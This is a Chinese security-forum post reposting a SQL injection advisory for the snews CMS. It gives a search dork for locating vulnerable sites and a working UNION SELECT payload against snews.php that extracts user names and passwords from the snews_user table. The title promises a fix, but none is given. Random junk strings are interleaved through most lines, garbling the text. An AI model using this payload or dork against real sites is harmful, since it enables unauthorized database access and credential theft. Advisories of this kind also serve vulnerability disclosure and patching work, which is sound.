找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1994|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability: e9 \- M8 p0 H1 @+ L
作者: By onestree. Y0 {5 w/ X. X' l  E1 r
下载地址 : http://snewscms.com/! o1 e$ I/ T3 R' N" t3 i. {
测试平台 : ubuntu 12.10 / win 7' V+ q. n7 R6 l# I
关键词: inurl:"tanyakan pada rumput yang bergoyang"9 ^! I/ Q4 q5 [
2 ~* W2 j) H7 m
7 o9 Z" R& F6 A5 T2 z
*************************************************************# J0 p9 m, L1 n5 o
# Q/ \+ ?* U7 C: ?
SQL poc:
: F8 y% f9 g( m $ H; n& _  r- N. [1 v/ o
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]3 K/ n0 A% J& ^

1 c; j  c6 x% n+ c示例
; b* l$ M6 V5 \7 _4 Z4 F8 ]; i+ e* G' Y5 _   o4 T- ^) r5 S' |5 j5 ^
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*( P) e" D3 q8 \2 [# m" z: i. }
2 G# \9 Q; N- Z) `: o6 Q
$ {5 R/ `) g# k2 [
致谢:
; R0 `/ W% c' Q! V( a
! q  ~9 `- f6 o5 s  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell) b5 t, A% ^: x! ^9 ?9 L+ i
     1 n9 d0 p% s: {, K4 \
          indonesiancoder - moeslimh4x0r - go-coder
7 B6 U+ f; s$ D* h 9 d0 D( p2 t) f: W
spesial my hunny :*
# B! |- T) y$ e4 v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表